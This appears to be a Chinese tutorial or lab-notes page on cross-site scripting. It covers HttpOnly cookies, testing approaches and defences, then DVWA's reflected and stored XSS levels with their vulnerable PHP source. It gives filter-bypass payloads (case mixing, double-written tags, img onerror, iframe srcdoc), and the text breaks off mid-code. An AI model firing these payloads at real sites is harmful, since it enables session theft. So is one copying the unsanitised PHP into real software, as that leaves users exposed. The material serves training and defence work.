<h2 id="Http-Only"><a href="#Http-Only" class="headerlink" title="Http-Only"></a>Http-Only</h2><blockquote>
<p>禁止页面的JavaScript访问带有HttpOnly属性的Cookie。<br><span data-type="text" style="color: var(--b3-font-color1);">PHP.INI</span>设置或代码引用</p>
<p>-session.cookie_httponly &#x3D;<span data-type="text" style="color: var(--b3-font-color1);">1</span></p>
<p>-<span data-type="text" style="color: var(--b3-font-color1);">ini_set</span>(“<span data-type="text" style="color: var(--b3-font-color3);">session.cookie_httponly</span>“, <span data-type="text" style="color: var(--b3-font-color1);">1</span>);</p>
<p>-<span data-type="text" style="color: var(--b3-font-color1);">setcookie</span>(<span data-type="text" style="color: var(--b3-font-color11);">‘’, ‘’</span>, <span data-type="text" style="color: var(--b3-font-color1);">time</span>() <span data-type="text" style="color: var(--b3-font-color1);">+ 3600</span>, ‘<span data-type="text" style="color: var(--b3-font-color4);">&#x2F;xss</span>‘, ‘’, <span data-type="text" style="color: var(--b3-font-color1);">false</span>, <span data-type="text" style="color: var(--b3-font-color1);">true</span>);</p>
</blockquote>
<p>开启HttpOnly时XSS窃取Cookie的加载情况</p>
<p><img src="/assets/image-20240811174619-fhkbfds.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240811174743-nartvt2.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>无法获取到name的值</p>
<p><img src="/assets/image-20240811174917-pvuyzqa.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>平台也没有</p>
<p><img src="/assets/image-20240811175749-7aqouzg.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>开启http-only但是并没有进行设置（等于没开）</p>
<p><img src="/assets/image-20240811180013-6d3ynhl.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>可以访问到</p>
<p><img src="/assets/image-20240811180038-v875ogf.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p><img src="/assets/image-20240811180116-b7jbbpr.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>‍</p>
<h3 id="绕过-1"><a href="#绕过-1" class="headerlink" title="绕过"></a>绕过</h3><p>三种，都比较鸡肋</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_42478365/article/details/116597222">CVE-PHPINFO-Flash&#x2F;java</a></p>
<p>‍</p>
<h1 id="如何测试"><a href="#如何测试" class="headerlink" title="如何测试"></a>如何测试</h1><h2 id="黑盒"><a href="#黑盒" class="headerlink" title="黑盒"></a>黑盒</h2><p>常用攻击语句</p>
<p><a href="assets/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E6%89%8B%E5%86%8CWEB%E5%AE%89%E5%85%A8%E6%BC%8F%E6%B4%9E-20240327132410-5mt5mil.pdf">渗透测试手册WEB安全漏洞.pdf</a> P<sub>138 –</sub> P<sub>143</sub></p>
<p>尽可能找到一切用户可控并且能够输出在页面代码中的地方，比如下面这些：</p>
<ul>
<li>URL的每一个参数</li>
<li>URL本身</li>
<li>表单</li>
<li>搜索框</li>
<li>常见业务场景</li>
</ul>
<p>重灾区：评论区、留言区、个人信息、订单信息等 针对型：站内信、网页即时通讯、私信、意见反馈 存在风险：搜索框、当前目录、图片属性等</p>
<h2 id="白盒"><a href="#白盒" class="headerlink" title="白盒"></a>白盒</h2><p>代码审计</p>
<p>‍</p>
<h1 id="绕过方式"><a href="#绕过方式" class="headerlink" title="绕过方式"></a>绕过方式</h1><p>xss常用绕过标签以及姿势总结:</p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/340080.html">https://www.freebuf.com/articles/web/340080.html</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/4067?time__1311=n4+xni0QG=oCqAKYiKDsD7feyQ2DgCZ=xriAoD">https://xz.aliyun.com/t/4067?time__1311=n4%2Bxni0QG%3DoCqAKYiKDsD7feyQ2DgCZ%3DxriAoD</a></p>
<p>‍</p>
<p>‍</p>
<h1 id="漏洞危害"><a href="#漏洞危害" class="headerlink" title="漏洞危害"></a>漏洞危害</h1><p><img src="/assets/image-20240811193700-7ykpa80.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p>‍</p>
<p>‍</p>
<h1 id="防御思路"><a href="#防御思路" class="headerlink" title="防御思路"></a>防御思路</h1><p>对输入(和 URL 参数)进行过滤，对输出进行编码。</p>
<p>也就是对提交的所有内容进行过滤，对 url 中的参数进行过滤，过滤掉会导致脚本执行的相关内容；</p>
<p>然后对动态输出到页面的内容进行 html 编码，使脚本无法在浏览器中执行</p>
<p>‍</p>
<h1 id="环境复现"><a href="#环境复现" class="headerlink" title="环境复现"></a>环境复现</h1><p>‍</p>
<ol>
<li><h2 id="DVWA靶场"><a href="#DVWA靶场" class="headerlink" title="DVWA靶场"></a>DVWA靶场</h2><h3 id="反射型XSS"><a href="#反射型XSS" class="headerlink" title="反射型XSS"></a>反射型XSS</h3><p> js代码在web应用的参数当中：搜索框</p>
<p> 数据流量：浏览器—-&gt;后端—-&gt;浏览器</p>
<h4 id="Low级别"><a href="#Low级别" class="headerlink" title="Low级别"></a>Low级别</h4><p> 源码：</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-title function_ invoke__">header</span> (<span class="hljs-string">&quot;X-XSS-Protection: 0&quot;</span>);<br><br><span class="hljs-comment">// Is there any input?</span><br><span class="hljs-keyword">if</span>( <span class="hljs-title function_ invoke__">array_key_exists</span>( <span class="hljs-string">&quot;name&quot;</span>, <span class="hljs-variable">$_GET</span> ) &amp;&amp; <span class="hljs-variable">$_GET</span>[ <span class="hljs-string">&#x27;name&#x27;</span> ] != <span class="hljs-literal">NULL</span> ) &#123;<br>    <span class="hljs-comment">// Feedback for end user</span><br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;&lt;pre&gt;Hello &#x27;</span> . <span class="hljs-variable">$_GET</span>[ <span class="hljs-string">&#x27;name&#x27;</span> ] . <span class="hljs-string">&#x27;&lt;/pre&gt;&#x27;</span>;<br>&#125;<br><br><span class="hljs-meta">?&gt;</span> <br></code></pre></td></tr></table></figure>

<p> 方法一：</p>
<p> 输入 <code>&lt;script&gt;alert(&#39;wuhu&#39;)&lt;/script&gt;</code>​ 的结果：</p>
<p> <img src="/assets/image-20240408185927-14dym80.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> 方法二：</p>
<p> 通过URL直接传递：</p>
<p> <img src="/assets/image-20240408190222-gunllxl.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<h4 id="Medium级别"><a href="#Medium级别" class="headerlink" title="Medium级别"></a>Medium级别</h4><p> 源码：</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-title function_ invoke__">header</span> (<span class="hljs-string">&quot;X-XSS-Protection: 0&quot;</span>);<br><br><span class="hljs-comment">// Is there any input?</span><br><span class="hljs-keyword">if</span>( <span class="hljs-title function_ invoke__">array_key_exists</span>( <span class="hljs-string">&quot;name&quot;</span>, <span class="hljs-variable">$_GET</span> ) &amp;&amp; <span class="hljs-variable">$_GET</span>[ <span class="hljs-string">&#x27;name&#x27;</span> ] != <span class="hljs-literal">NULL</span> ) &#123;<br>    <span class="hljs-comment">// Get input</span><br>    <span class="hljs-variable">$name</span> = <span class="hljs-title function_ invoke__">str_replace</span>( <span class="hljs-string">&#x27;&lt;script&gt;&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$_GET</span>[ <span class="hljs-string">&#x27;name&#x27;</span> ] );<br><br>    <span class="hljs-comment">// Feedback for end user</span><br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;pre&gt;Hello $&#123;name&#125;&lt;/pre&gt;&quot;</span>;<br>&#125;<br><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p> 这里仅过滤了<code>&lt;script&gt;</code>​这个标签</p>
<p> 方法一：</p>
<p> 大小写绕过</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php">&lt;sCript&gt;<span class="hljs-title function_ invoke__">alert</span>(<span class="hljs-string">&#x27;wuhu&#x27;</span>)&lt;/scRIpt&gt;<br>&lt;SCRIPT&gt;<span class="hljs-title function_ invoke__">alert</span>(<span class="hljs-string">&#x27;wuhu&#x27;</span>)&lt;/SCRIPT&gt;<br></code></pre></td></tr></table></figure>

<p> 方法二：</p>
<p> 双写绕过</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php">&lt;scr&lt;script&gt;ipt&gt;<span class="hljs-title function_ invoke__">alert</span>(<span class="hljs-string">&#x27;wuhu&#x27;</span>)&lt;/script&gt;<br>&lt;s&lt;script&gt;cript&gt;<span class="hljs-title function_ invoke__">alert</span>(<span class="hljs-string">&#x27;wuhu&#x27;</span>)&lt;/script&gt;<br></code></pre></td></tr></table></figure>

<p> 方法三：</p>
<p> 使用非<code>&lt;script&gt;</code>的<a target="_blank" rel="noopener" href="https://blog.csdn.net/mikebarton/article/details/103183559?ops_request_misc=&request_id=&biz_id=102&utm_term=body%E6%A0%87%E7%AD%BE%E5%BA%94%E7%94%A8%E5%88%B0xss&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-0-103183559.142%5Ev100%5Epc_search_result_base9&spm=1018.2226.3001.4449">其他标签</a></p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">&lt;img src=<span class="hljs-number">1</span> onerror=<span class="hljs-string">&#x27;alert(&quot;wuhu&quot;)&#x27;</span>&gt;<br></code></pre></td></tr></table></figure>

<h4 id="High级别"><a href="#High级别" class="headerlink" title="High级别"></a>High级别</h4><p> 源码：</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-title function_ invoke__">header</span> (<span class="hljs-string">&quot;X-XSS-Protection: 0&quot;</span>);<br><br><span class="hljs-comment">// Is there any input?</span><br><span class="hljs-keyword">if</span>( <span class="hljs-title function_ invoke__">array_key_exists</span>( <span class="hljs-string">&quot;name&quot;</span>, <span class="hljs-variable">$_GET</span> ) &amp;&amp; <span class="hljs-variable">$_GET</span>[ <span class="hljs-string">&#x27;name&#x27;</span> ] != <span class="hljs-literal">NULL</span> ) &#123;<br>    <span class="hljs-comment">// Get input</span><br>    <span class="hljs-variable">$name</span> = <span class="hljs-title function_ invoke__">preg_replace</span>( <span class="hljs-string">&#x27;/&lt;(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$_GET</span>[ <span class="hljs-string">&#x27;name&#x27;</span> ] );<br><br>    <span class="hljs-comment">// Feedback for end user</span><br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;pre&gt;Hello $&#123;name&#125;&lt;/pre&gt;&quot;</span>;<br>&#125;<br><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p> 用<code>preg_replace()</code>​函数进行正则过滤<code>&lt;script&gt;</code>​标签，使用了正则表达式直接把<code>&lt;*s*c*r*i*p*t</code>​给过滤了，<code>*</code>​ 代表一个或多个任意字符，<code>i</code>​ 代表不区分大小写。所以<code>&lt;script&gt;</code>​标签在这里就不能用了，但可以通过<code>img</code>​、<code>body</code>​等标签的事件或者<code>iframe</code>​等<a target="_blank" rel="noopener" href="https://blog.csdn.net/mikebarton/article/details/103183559?ops_request_misc=&amp;request_id=&amp;biz_id=102&amp;utm_term=body%E6%A0%87%E7%AD%BE%E5%BA%94%E7%94%A8%E5%88%B0xss&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-0-103183559.142%5Ev100%5Epc_search_result_base9&amp;spm=1018.2226.3001.4449">其他标签</a>的src注入恶意的js代码。</p>
<p> 这里输入<code>&lt;img src=1 onerror=&#39;alert(&quot;wuhu&quot;)&#39;&gt;</code>​</p>
<p> <img src="/assets/image-20240408195544-q2g30qf.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> 这里输入<code>&lt;iframe srcdoc=&quot;&lt;img src=x onerror=alert(&#39;wuhu&#39;)&gt;&quot;&gt;&lt;/iframe&gt;</code>​</p>
<p> <img src="/assets/image-20240408202258-rrsc1vu.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<h3 id="存储型XSS"><a href="#存储型XSS" class="headerlink" title="存储型XSS"></a>存储型XSS</h3><p> js代码不在某个参数中，而是被写进了数据库或文件可以永久保存数据的介质中，如留言板等。</p>
<p> 数据流量：浏览器—&gt;后端—&gt;数据库—&gt;后端—&gt;浏览器</p>
<h4 id="Low级别-1"><a href="#Low级别-1" class="headerlink" title="Low级别"></a>Low级别</h4><p> 源码：</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-keyword">if</span>( <span class="hljs-keyword">isset</span>( <span class="hljs-variable">$_POST</span>[ <span class="hljs-string">&#x27;btnSign&#x27;</span> ] ) ) &#123;<br>    <span class="hljs-comment">// Get input</span><br>    <span class="hljs-variable">$message</span> = <span class="hljs-title function_ invoke__">trim</span>( <span class="hljs-variable">$_POST</span>[ <span class="hljs-string">&#x27;mtxMessage&#x27;</span> ] );<br>    <span class="hljs-variable">$name</span>    = <span class="hljs-title function_ invoke__">trim</span>( <span class="hljs-variable">$_POST</span>[ <span class="hljs-string">&#x27;txtName&#x27;</span> ] );<br><br>    <span class="hljs-comment">// Sanitize message input</span><br>    <span class="hljs-variable">$message</span> = <span class="hljs-title function_ invoke__">stripslashes</span>( <span class="hljs-variable">$message</span> );<br>    <span class="hljs-variable">$message</span> = ((<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>]) &amp;&amp; <span class="hljs-title function_ invoke__">is_object</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>])) ? <span class="hljs-title function_ invoke__">mysqli_real_escape_string</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>],  <span class="hljs-variable">$message</span> ) : ((<span class="hljs-title function_ invoke__">trigger_error</span>(<span class="hljs-string">&quot;[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.&quot;</span>, E_USER_ERROR)) ? <span class="hljs-string">&quot;&quot;</span> : <span class="hljs-string">&quot;&quot;</span>));<br><br>    <span class="hljs-comment">// Sanitize name input</span><br>    <span class="hljs-variable">$name</span> = ((<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>]) &amp;&amp; <span class="hljs-title function_ invoke__">is_object</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>])) ? <span class="hljs-title function_ invoke__">mysqli_real_escape_string</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>],  <span class="hljs-variable">$name</span> ) : ((<span class="hljs-title function_ invoke__">trigger_error</span>(<span class="hljs-string">&quot;[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.&quot;</span>, E_USER_ERROR)) ? <span class="hljs-string">&quot;&quot;</span> : <span class="hljs-string">&quot;&quot;</span>));<br><br>    <span class="hljs-comment">// Update database</span><br>    <span class="hljs-variable">$query</span>  = <span class="hljs-string">&quot;INSERT INTO guestbook ( comment, name ) VALUES ( &#x27;<span class="hljs-subst">$message</span>&#x27;, &#x27;<span class="hljs-subst">$name</span>&#x27; );&quot;</span>;<br>    <span class="hljs-variable">$result</span> = <span class="hljs-title function_ invoke__">mysqli_query</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>],  <span class="hljs-variable">$query</span> ) <span class="hljs-keyword">or</span> <span class="hljs-keyword">die</span>( <span class="hljs-string">&#x27;&lt;pre&gt;&#x27;</span> . ((<span class="hljs-title function_ invoke__">is_object</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>])) ? <span class="hljs-title function_ invoke__">mysqli_error</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>]) : ((<span class="hljs-variable">$___mysqli_res</span> = <span class="hljs-title function_ invoke__">mysqli_connect_error</span>()) ? <span class="hljs-variable">$___mysqli_res</span> : <span class="hljs-literal">false</span>)) . <span class="hljs-string">&#x27;&lt;/pre&gt;&#x27;</span> );<br><br>    <span class="hljs-comment">//mysql_close();</span><br>&#125;<br><br><span class="hljs-meta">?&gt;</span> <br></code></pre></td></tr></table></figure>

<ul>
<li><code>trim(string,charlist)</code>​ ：移除字符串两侧的空白字符或其他预定义字符</li>
<li><code>stripslashes(string)</code>​： 删除反斜杠”&#x2F;“</li>
<li><code>mysqli_real_escape_string(string,connection)</code>​ ：函数会对字符串string中的特殊符号（<code>\x00</code>​，<code>\n</code>​，<code>\r</code>​，<code>\</code>​，<code>&#39;</code>​，<code>&quot;</code>​，<code>\x1a</code>​）进行转义。</li>
</ul>
<p> Message处输入<code>&lt;script&gt;alert(&#39;芜湖&#39;)&lt;/script&gt;</code>​</p>
<p> <img src="/assets/image-20240408220855-03mid75.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> Name处输入<code>&lt;script&gt;alert(&#39;芜湖&#39;)&lt;/script&gt;</code>​</p>
<p> <img src="/assets/image-20240408221122-7xezy34.png" srcset="/img/loading.gif" lazyload alt="image">​</p>
<p> 两个都输入<code>&lt;script&gt;alert(&#39;芜湖&#39;)&lt;/script&gt;</code>​则会弹出两次警告,这里不再赘述</p>
<h4 id="Medium级别-1"><a href="#Medium级别-1" class="headerlink" title="Medium级别"></a>Medium级别</h4><p> 源码：</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-keyword">if</span>( <span class="hljs-keyword">isset</span>( <span class="hljs-variable">$_POST</span>[ <span class="hljs-string">&#x27;btnSign&#x27;</span> ] ) ) &#123;<br>    <span class="hljs-comment">// Get input</span><br>    <span class="hljs-variable">$message</span> = <span class="hljs-title function_ invoke__">trim</span>( <span class="hljs-variable">$_POST</span>[ <span class="hljs-string">&#x27;mtxMessage&#x27;</span> ] );<br>    <span class="hljs-variable">$name</span>    = <span class="hljs-title function_ invoke__">trim</span>( <span class="hljs-variable">$_POST</span>[ <span class="hljs-string">&#x27;txtName&#x27;</span> ] );<br><br>    <span class="hljs-comment">// Sanitize message input</span><br>    <span class="hljs-variable">$message</span> = <span class="hljs-title function_ invoke__">strip_tags</span>( <span class="hljs-title function_ invoke__">addslashes</span>( <span class="hljs-variable">$message</span> ) );<br>    <span class="hljs-variable">$message</span> = ((<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>]) &amp;&amp; <span class="hljs-title function_ invoke__">is_object</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>])) ? <span class="hljs-title function_ invoke__">mysqli_real_escape_string</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>],  <span class="hljs-variable">$message</span> ) : ((<span class="hljs-title function_ invoke__">trigger_error</span>(<span class="hljs-string">&quot;[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.&quot;</span>, E_USER_ERROR)) ? <span class="hljs-string">&quot;&quot;</span> : <span class="hljs-string">&quot;&quot;</span>));<br>    <span class="hljs-variable">$message</span> = <span class="hljs-title function_ invoke__">htmlspecialchars</span>( <span class="hljs-variable">$message</span> );<br><br>    <span class="hljs-comment">// Sanitize name input</span><br>    <span class="hljs-variable">$name</span> = <span class="hljs-title function_ invoke__">str_replace</span>( <span class="hljs-string">&#x27;&lt;script&gt;&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$name</span> );<br>    <span class="hljs-variable">$name</span> = ((<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>]) &amp;&amp; <span class="hljs-title function_ invoke__">is_object</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>])) ? <span class="hljs-title function_ invoke__">mysqli_real_escape_string</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>],  <span class="hljs-variable">$name</span> ) : ((<span class="hljs-title function_ invoke__">trigger_error</span>(<span class="hljs-string">&quot;[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.&quot;</span>, E_USER_ERROR)) ? <span class="hljs-string">&quot;&quot;</span> : <span class="hljs-string">&quot;&quot;</span>));<br><br>    <span class="hljs-comment">// Update database</span><br>    <span class="hljs-variable">$query</span>  = <span class="hljs-string">&quot;INSERT INTO guestbook ( comment, name ) VALUES ( &#x27;<span class="hljs-subst">$message</span>&#x27;, &#x27;<span class="hljs-subst">$name</span>&#x27; );&quot;</span>;<br>    <span class="hljs-variable">$result</span> = <span class="hljs-title function_ invoke__">mysqli_query</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>],  <span class="hljs-variable">$query</span> ) <span class="hljs-keyword">or</span> <span class="hljs-keyword">die</span>( <span class="hljs-string">&#x27;&lt;pre&gt;&#x27;</span> . ((<span class="hljs-title function_ invoke__">is_object</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>])) ? <span class="hljs-title function_ invoke__">mysqli_error</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>]) : ((<span class="hljs-variable">$___mysqli_res</span> = <span class="hljs-title function_ invoke__">mysqli_connect_error</span>()) ? <span class="hljs-variable">$___mysqli_res</span> : <span class="hljs-literal">false</span>)) . <span class="hljs-string">&#x27;&lt;/pre&gt;&#x27;</span> );<br><br>    <span class="hljs-comment">//mysql_close();</span><br>&#125;<br><br><span class="hljs-meta">?&gt;</span> <br></code></pre></td></tr></table></figure>

<ul>
<li><code>addslashes(string)</code>​ ：函数返回在预定义字符之前添加反斜杠的字符串，预定义字符 <code>&#39;</code>​ 、<code>&quot;</code>​ 、<code>\</code>​ 、<code>NULL</code>​</li>
<li><code>strip_tags(string)</code>​ ：函数剥去string字符串中的 HTML、XML 以及 PHP 的标签。</li>
<li><code>htmlspecialchars(string)</code>​： 把预定义的字符 <code>&lt;</code>​ 、 <code>&gt;</code>​ 、<code>&amp;</code>​ 、<code>&#39;</code>​、<code>&quot;</code>​ 转换为 HTML 实体，防止浏览器将其作为HTML元素。</li>
</ul>
<p> 这里对<code>$message</code>​做了严格过滤，目前找不到绕过方法，但是对<code>$name</code>​只过滤了<code>&lt;script&gt;</code>​标签，所以可以对其进行反射型XSS中的Medium级别的操作 ，过程不再赘述</p>
<h4 id="High级别-1"><a href="#High级别-1" class="headerlink" title="High级别"></a>High级别</h4><p> 源码：</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-keyword">if</span>( <span class="hljs-keyword">isset</span>( <span class="hljs-variable">$_POST</span>[ <span class="hljs-string">&#x27;btnSign&#x27;</span> ] ) ) &#123;<br>    <span class="hljs-comment">// Get input</span><br>    <span class="hljs-variable">$message</span> = <span class="hljs-title function_ invoke__">trim</span>( <span class="hljs-variable">$_POST</span>[ <span class="hljs-string">&#x27;mtxMessage&#x27;</span> ] );<br>    <span class="hljs-variable">$name</span>    = <span class="hljs-title function_ invoke__">trim</span>( <span class="hljs-variable">$_POST</span>[ <span class="hljs-string">&#x27;txtName&#x27;</span> ] );<br><br>    <span class="hljs-comment">// Sanitize message input</span><br>    <span class="hljs-variable">$message</span> = <span class="hljs-title function_ invoke__">strip_tags</span>( <span class="hljs-title function_ invoke__">addslashes</span>( <span class="hljs-variable">$message</span> ) );<br>    <span class="hljs-variable">$message</span> = ((<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>]) &amp;&amp; <span class="hljs-title function_ invoke__">is_object</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>])) ? <span class="hljs-title function_ invoke__">mysqli_real_escape_string</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>],  <span class="hljs-variable">$message</span> ) : ((<span class="hljs-title function_ invoke__">trigger_error</span>(<span class="hljs-string">&quot;[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.&quot;</span>, E_USER_ERROR)) ? <span class="hljs-string">&quot;&quot;</span> : <span class="hljs-string">&quot;&quot;</span>));<br>    <span class="hljs-variable">$message</span> = <span class="hljs-title function_ invoke__">htmlspecialchars</span>( <span class="hljs-variable">$message</span> );<br><br>    <span class="hljs-comment">// Sanitize name input</span><br>    <span class="hljs-variable">$name</span> = <span class="hljs-title function_ invoke__">preg_replace</span>( <span class="hljs-string">&#x27;/&lt;(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$name</span> );<br>    <span class="hljs-variable">$name</span> = ((<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>]) &amp;&amp; <span class="hljs-title function_ invoke__">is_object</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>])) ? <span class="hljs-title function_ invoke__">mysqli_real_escape_string</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;___mysqli_ston&quot;</span>],  <span class="hljs-variable">$name</span> ) : ((<span class="hljs-title function_ invoke__">trigger_error</span>(<span class="hljs-string">&quot;[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.&quot;</span>, E_USER_ERROR)) ? <span class="hljs-string">&quot;&quot;</span> : <span class="hljs-string">&quot;&quot;</span>));<br><br>    <span class="hljs-comment">// Update database</span><br>    <span class="hljs-variable">$query</span>  = <span class="hljs-string">&quot;INSERT INTO guestbook ( comment, name ) VALUES ( &#x27;<span class="hljs-subst">$message</span>&#x27;, &#x27;<span class="hljs-subst">$name</span>&#x27; );&quot;</span>;<br>    <span class="hljs-variable">$result</span> = <span class="hljs-title function_ invoke__">mysqli_query</span>(<span class="hljs-variable">$GLOBALS</span>[<span 